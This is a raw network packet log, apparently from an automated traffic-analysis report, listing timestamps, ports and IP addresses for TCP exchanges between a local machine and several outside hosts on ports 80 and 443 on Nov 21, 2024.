                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:40.834960938 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:40.836158037 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:40.836170912 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:40.836241007 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:40.837253094 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:40.837270975 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:40.837306976 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:40.837323904 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:40.838157892 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:40.838219881 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:40.838267088 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:40.838315010 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:40.839330912 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:40.839342117 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:40.839384079 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:40.840449095 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:40.840493917 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:40.840564013 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:40.840615988 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:40.841759920 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:40.841856003 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:40.841871977 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:40.841912031 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:40.842927933 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:40.842938900 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:40.843103886 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:40.843877077 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:40.843974113 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:40.843998909 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:40.844029903 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:40.852843046 CET44349836172.183.192.109192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:40.852863073 CET44349836172.183.192.109192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:40.852946997 CET49836443192.168.2.5172.183.192.109
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:40.852946997 CET49836443192.168.2.5172.183.192.109
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:40.852960110 CET44349836172.183.192.109192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:40.853085041 CET49836443192.168.2.5172.183.192.109
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:40.891546011 CET4434983713.107.246.45192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:40.892303944 CET49837443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:40.892350912 CET4434983713.107.246.45192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:40.893022060 CET49837443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:40.893042088 CET4434983713.107.246.45192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:40.906724930 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:40.983000040 CET44349836172.183.192.109192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:40.983066082 CET44349836172.183.192.109192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:40.983091116 CET49836443192.168.2.5172.183.192.109
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:40.983100891 CET44349836172.183.192.109192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:40.983139992 CET49836443192.168.2.5172.183.192.109
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:40.983196020 CET49836443192.168.2.5172.183.192.109
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:40.983202934 CET44349836172.183.192.109192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:40.983237982 CET44349836172.183.192.109192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:40.983331919 CET49836443192.168.2.5172.183.192.109
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:40.983419895 CET49836443192.168.2.5172.183.192.109
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:40.983436108 CET44349836172.183.192.109192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:40.983443022 CET49836443192.168.2.5172.183.192.109
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:40.983504057 CET49836443192.168.2.5172.183.192.109
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.027807951 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.148569107 CET49846443192.168.2.513.107.246.40
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.148607016 CET4434984613.107.246.40192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.148686886 CET49847443192.168.2.513.107.246.40
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.148720980 CET4434984713.107.246.40192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.148782969 CET49846443192.168.2.513.107.246.40
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.148808002 CET49847443192.168.2.513.107.246.40
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.148849010 CET49848443192.168.2.513.107.246.40
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.148895979 CET4434984813.107.246.40192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.148947001 CET49848443192.168.2.513.107.246.40
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.148988008 CET49849443192.168.2.513.107.246.40
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.149024963 CET4434984913.107.246.40192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.149210930 CET49850443192.168.2.513.107.246.40
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.149229050 CET49849443192.168.2.513.107.246.40
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.149231911 CET4434985013.107.246.40192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.149406910 CET49851443192.168.2.513.107.246.40
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.149418116 CET4434985113.107.246.40192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.149435997 CET49850443192.168.2.513.107.246.40
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.149590969 CET49846443192.168.2.513.107.246.40
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.149604082 CET4434984613.107.246.40192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.149621010 CET49851443192.168.2.513.107.246.40
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.149796009 CET49847443192.168.2.513.107.246.40
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.149813890 CET4434984713.107.246.40192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.149966955 CET49848443192.168.2.513.107.246.40
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.150003910 CET4434984813.107.246.40192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.150078058 CET49849443192.168.2.513.107.246.40
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.150095940 CET4434984913.107.246.40192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.150207996 CET49850443192.168.2.513.107.246.40
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.150233030 CET4434985013.107.246.40192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.150302887 CET49851443192.168.2.513.107.246.40
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.150317907 CET4434985113.107.246.40192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.239025116 CET4434984313.107.246.45192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.239593983 CET49843443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.239608049 CET4434984313.107.246.45192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.240075111 CET49843443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.240081072 CET4434984313.107.246.45192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.251491070 CET4434984013.107.246.45192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.253931999 CET49840443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.253954887 CET4434984013.107.246.45192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.254528046 CET49840443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.254539967 CET4434984013.107.246.45192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.264028072 CET4434984413.107.246.45192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.264451981 CET49844443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.264494896 CET4434984413.107.246.45192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.264873981 CET49844443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.264889956 CET4434984413.107.246.45192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.340019941 CET4434983713.107.246.45192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.340177059 CET4434983713.107.246.45192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.340276003 CET49837443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.340610027 CET49837443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.340640068 CET4434983713.107.246.45192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.340667009 CET49837443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.340687990 CET4434983713.107.246.45192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.344058990 CET49852443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.344094992 CET4434985213.107.246.45192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.344249964 CET49852443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.344418049 CET49852443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.344430923 CET4434985213.107.246.45192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.366614103 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.366699934 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.366888046 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.366955996 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.367108107 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.367165089 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.367276907 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.367338896 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.367393017 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.367625952 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.368423939 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.368498087 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.368510008 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.368686914 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.369573116 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.369623899 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.369649887 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.369693995 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.370728016 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.370826960 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.370831966 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.370932102 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.371844053 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.371898890 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.371943951 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.372028112 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.373014927 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.373066902 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.373177052 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.373379946 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.374161005 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.374263048 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.374375105 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.374375105 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.375286102 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.375332117 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.375435114 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.375617027 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.376444101 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.376493931 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.376530886 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.376720905 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.377590895 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.377701044 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.377731085 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.377825022 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.378703117 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.378762960 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.378837109 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.378956079 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.379863024 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.379893064 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.380008936 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.381021023 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.381063938 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.381186962 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.381288052 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.382147074 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.382184029 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.382275105 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.382348061 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.383294106 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.383404016 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.383435965 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.383435965 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.384489059 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.384540081 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.384602070 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.384656906 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.385613918 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.385675907 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.385708094 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.385755062 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.386769056 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.386817932 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.386869907 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.387058020 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.387914896 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.388017893 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.388052940 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.388052940 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.389020920 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.389184952 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.389200926 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.389234066 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.390156984 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.390218973 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.390278101 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.390399933 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.391324043 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.391374111 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.391407013 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.391469955 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.392457962 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.392518044 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.392550945 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.392868042 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.393589973 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.393717051 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.393738031 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.393892050 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.394727945 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.394774914 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.394776106 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.394862890 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.395888090 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.395946980 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.395963907 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.396173954 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.397028923 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.397078037 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.397130013 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.397207975 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.398163080 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.398281097 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.398319006 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.398319006 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.399316072 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.399424076 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.399429083 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.399492025 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.400468111 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.400543928 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.400571108 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.400651932 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.401616096 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.401779890 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.401840925 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.402740002 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.402798891 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.402844906 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.402844906 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.403903961 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.403997898 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.404005051 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.404577017 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.405050039 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.405112028 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.405139923 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.405415058 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.406210899 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.406265974 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.406378031 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.406491041 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.407329082 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.407439947 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.407607079 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.408478022 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.408560038 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.408615112 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.409605980 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.409739017 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.409745932 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.409928083 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.410772085 CET8049773185.215.113.206192.168.2.5
